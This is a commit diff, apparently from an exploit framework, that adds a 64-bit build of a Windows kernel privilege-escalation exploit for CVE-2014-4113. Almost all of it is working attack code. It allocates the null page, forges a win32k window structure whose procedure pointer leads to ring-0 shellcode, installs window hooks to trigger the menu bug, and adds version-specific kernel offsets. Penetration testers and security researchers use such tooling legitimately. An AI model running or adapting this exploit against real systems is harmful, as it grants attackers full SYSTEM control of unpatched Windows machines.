Land jvazquez-r7#22, @zeroSteiner 64 bits version

Author: jvazquez-r7

data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll

@@ -1,18 +1,26 @@
 
-Microsoft Visual Studio Solution File, Format Version 11.00
-# Visual Studio 2010
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Express 2013 for Windows Desktop
+VisualStudioVersion = 12.0.30723.0
+MinimumVisualStudioVersion = 10.0.40219.1
 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
 EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
 		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
 	EndGlobalSection
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
 		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
 		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
+		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.ActiveCfg = Debug|x64
+		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.Build.0 = Debug|x64
 		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
 		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
+		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.ActiveCfg = Release|x64
+		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.Build.0 = Release|x64
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE

data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll

@@ -16,9 +16,13 @@ typedef NTSTATUS *PNTSTATUS;
 
 #define DEBUGGING FALSE
 
+#ifdef _M_X64
+typedef unsigned __int64 QWORD;
+typedef QWORD *PQWORD;
+#endif
+
 int WndProcClue = 0;
 int HookCallbackClue = 0;
-int HookCallbackThreeClue = 0;
 WNDPROC lpPrevWndFunc;
 DWORD MyProcessId = 0;
 DWORD OffsetWindows = 0;
@@ -45,15 +49,15 @@ typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
 	);
 
 typedef struct _SYSTEM_MODULE {
-	ULONG                Reserved1;
-	ULONG                Reserved2;
+	HANDLE               Reserved1;
+	PVOID                Reserved2;
 	PVOID                ImageBaseAddress;
 	ULONG                ImageSize;
 	ULONG                Flags;
-	WORD                 Id;
-	WORD                 Rank;
-	WORD                 w018;
-	WORD                 NameOffset;
+	USHORT               Id;
+	USHORT               Rank;
+	USHORT               w018;
+	USHORT               NameOffset;
 	BYTE                 Name[256];
 } SYSTEM_MODULE, *PSYSTEM_MODULE;
 
@@ -66,48 +70,28 @@ typedef struct _SYSTEM_MODULE_INFORMATION {
 lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
 lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
 
-LRESULT __stdcall HookCallbackThree(int code, WPARAM wParam, LPARAM lParam)
-{
-	if (wParam == 4 && *(DWORD *)lParam == GetCurrentThreadId() && *(DWORD *)(lParam + 12) == 0x900516)
-		HookCallbackThreeClue = 1;
-	return CallNextHookEx(0, code, wParam, lParam);
-}
 
-LRESULT __stdcall HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
+long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
 {
-	LRESULT result;
-	DWORD v5;
-
-	if (Msg == 0x1EB)
-	{
-		v5 = GetCurrentThreadId();
-		SetWindowsHookExA(9, HookCallbackThree, 0, v5);
-		SendMessageA(hWnd, 0, 0x900516u, 0);
-		UnhookWindowsHook(9, HookCallbackThree);
-		if (HookCallbackThreeClue)
-		{
-			EndMenu();
-			result = CallWindowProcA(lpPrevWndFunc, hWnd, 0x1EBu, wParam, lParam);
-		}
-		else
-		{
-			EndMenu();
-			result = -5;
-		}
-	}
-	else
-	{
-		result = CallWindowProcA(lpPrevWndFunc, hWnd, Msg, wParam, lParam);
-	}
-	return result;
+	EndMenu();
+	return -5;
 }
 
-LRESULT __stdcall HookCallback(int code, WPARAM wParam, LPARAM lParam) {
+LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
+#ifdef _M_X64
+	if (*(DWORD *)(lParam + 16) == 0x1EB && !HookCallbackClue)
+#else
 	if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
+#endif
 	{
 		HookCallbackClue = 1;
-		if (UnhookWindowsHook(4, HookCallback))
-			lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), -4, (LONG)HookCallbackTwo);
+		if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
+#ifdef _M_X64
+			lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
+#else
+			lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
+#endif
+		}
 	}
 	return CallNextHookEx(0, code, wParam, lParam);
 }
@@ -122,13 +106,21 @@ LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
 	return DefWindowProc(hwnd, msg, wParam, lParam);
 }
 
+#ifdef _M_X64
+QWORD MyPtiCurrent(void) {
+	void *teb = (void *)__readgsqword(0x30);
+	QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
 
+	return Win32ThreadInfo;
+}
+#else
 DWORD __stdcall MyPtiCurrent() {
 	__asm {
 		mov eax, fs : 18h
 			mov eax, [eax + 40h]
 	}
 }
+#endif
 
 int _stdcall shellcode_ring0(int one, int two, int three, int four) {
 	void *my_process_info = NULL;
@@ -151,6 +143,7 @@ LogMessage(char* pszFormat, ...) {
 	va_list args;
 	va_start(args, pszFormat);
 	vsprintf(s_acBuf, pszFormat, args);
+	printf("%s\n", s_acBuf);
 	OutputDebugString(s_acBuf);
 	va_end(args);
 }
@@ -184,6 +177,12 @@ void Win32kNullPage(LPVOID lpPayload) {
 		return;
 	}
 
+#ifdef _M_X64
+	if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
+		LogMessage("[*] Windows 6.1 found...");
+		OffsetWindows = 0x208;
+	}
+#else
 	if (VersionInformation.dwMajorVersion == 6) {
 		if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
 			LogMessage("[*] Windows 6.1 found...");
@@ -212,6 +211,7 @@ void Win32kNullPage(LPVOID lpPayload) {
 			return;
 		}
 	}
+#endif
 	else {
 		LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
 		return;
@@ -306,9 +306,13 @@ void Win32kNullPage(LPVOID lpPayload) {
 		return;
 	}
 
+#ifdef _M_X64
+	pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl));
+	LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
+#else
 	pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
-
 	LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
+#endif
 
 	MyProcessId = GetCurrentProcessId();
 
@@ -336,7 +340,11 @@ void Win32kNullPage(LPVOID lpPayload) {
 	// Making everything ready for exploitation...
 
 	LogMessage("[*] Allocating null page...");
+#ifdef _M_X64
+	ULONGLONG base_address = 0x00000000fffffffb;
+#else
 	DWORD base_address = 1;
+#endif
 	SIZE_T region_size = 0x1000;
 	ULONG zero_bits = 0;
 	HANDLE current_process = NULL;
@@ -350,7 +358,11 @@ void Win32kNullPage(LPVOID lpPayload) {
 
 	LogMessage("[*] Getting PtiCurrent...");
 
+#ifdef _M_X64
+	ULONGLONG pti = MyPtiCurrent();
+#else
 	DWORD pti = MyPtiCurrent();
+#endif
 
 	if (pti == 0) {
 		LoadLibrary("user32.dll");
@@ -363,11 +375,28 @@ void Win32kNullPage(LPVOID lpPayload) {
 		return;
 	}
 	else {
+#ifdef _M_X64
+		LogMessage("[*] Good! pti 0x%016llx", pti);
+#else
 		LogMessage("[*] Good! pti 0x%08x", pti);
+#endif
 	}
 
-
 	LogMessage("[*] Creating a fake structure at NULL...");
+
+#ifdef _M_X64
+	void *test = NULL;
+	(QWORD)test = 0x10000000B;
+	*((PQWORD)test) = pti;
+
+	/* win32k!tagWND->bServerSideWindowProc = TRUE */
+	(QWORD)test = 0x100000025;
+	*((PBYTE)test) = 4;
+
+	/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
+	(QWORD)test = 0x10000008B;
+	*((PQWORD)test) = &shellcode_ring0;
+#else
 	void *test = promise_land + 3;
 	/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
 	.text:BF8B93F4 02C mov     edi, _gptiCurrent
@@ -380,7 +409,7 @@ void Win32kNullPage(LPVOID lpPayload) {
 
 	test = promise_land + 0x5b;
 	*(LPDWORD)test = (DWORD)shellcode_ring0;
-
+#endif
 
 	// Exploit!
 
@@ -394,7 +423,7 @@ void Win32kNullPage(LPVOID lpPayload) {
 	MENUITEMINFOA MenuOneInfo;
 	memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
 	MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
-	MenuOneInfo.fMask = 64;
+	MenuOneInfo.fMask = MIIM_STRING;
 
 	if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
 		LogMessage("[!] First InsertMenuItemA failed");
@@ -412,7 +441,7 @@ void Win32kNullPage(LPVOID lpPayload) {
 	MENUITEMINFOA MenuTwoInfo;
 	memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
 	MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
-	MenuTwoInfo.fMask = 68;
+	MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
 	MenuTwoInfo.dwTypeData = "";
 	MenuTwoInfo.cch = 1;
 	MenuTwoInfo.hSubMenu = MenuOne;
@@ -423,8 +452,7 @@ void Win32kNullPage(LPVOID lpPayload) {
 		return;
 	}
 
-	DWORD thread_id = GetCurrentThreadId();
-	if (SetWindowsHookExA(4, HookCallback, NULL, thread_id) == NULL) {
+	if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) {
 		LogMessage("[!] SetWindowsHookExA failed :-(\n");
 		DestroyMenu(MenuTwo);
 		DestroyMenu(MenuOne);